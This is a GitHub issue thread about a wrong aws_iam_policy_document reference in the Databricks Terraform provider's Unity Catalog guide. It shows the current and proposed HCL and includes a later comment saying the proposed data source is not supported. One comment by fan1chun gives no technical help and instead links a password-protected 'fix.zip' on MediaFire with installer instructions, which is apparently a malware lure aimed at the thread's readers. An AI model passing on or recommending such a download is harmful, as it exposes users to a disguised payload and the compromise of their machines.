### ISSUE TITLE
[DOC] Issue Incorrect Reference to aws_iam_policy_document in Unity Catalog Guide

### ISSUE THREAD

**Issue by edejong-dbc** [databricks/terraform-provider-databricks#3964]
### Affected Resource(s)
[Section Configure External Locations and Credentials in the Unity Catalog Guide](https://registry.terraform.io/providers/databricks/databricks/latest/docs/guides/unity-catalog#configure-external-locations-and-credentials)

### Expected Details

The Terraform section under "Then we can create the required objects in AWS" is incorrect. It has:

```hcl
resource "aws_iam_role" "external_data_access" {
  name                = local.uc_iam_role
  assume_role_policy  = data.aws_iam_policy_document.this.json
  managed_policy_arns = [aws_iam_policy.external_data_access.arn]
  tags = merge(var.tags, {
    Name = "${local.prefix}-unity-catalog external access IAM role"
  })
}
```

where it should be

```hcl
resource "aws_iam_role" "external_data_access" {
  name = local.unity_catalog_iam_role
  assume_role_policy = data.databricks_aws_unity_catalog_assume_role_policy.this.json
  managed_policy_arns = [aws_iam_policy.external_data_access.arn]
  tags = merge(var.tags, {
    Name = "${local.prefix}-unity-catalog external access IAM role"
  })
}
```

in other words: there is no `aws_iam_policy_document` data resource anymore, but instead a `databricks_aws_unity_catalog_assume_role_policy`.

### List of things to potentially add/remove

This is a list of things to manipulate in the docs:

- [ ] Modify the line to have `assume_role_policy` point to `data.databricks_aws_unity_catalog_assume_role_policy.this.json`

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Nessie-LQ** [comment]
If you use databricks_aws_unity_catalog_assume_role_policy, it will through back an error saying 
The provider databricks/databricks does not support data source "databricks_aws_unity_catalog_assume_role_policy".
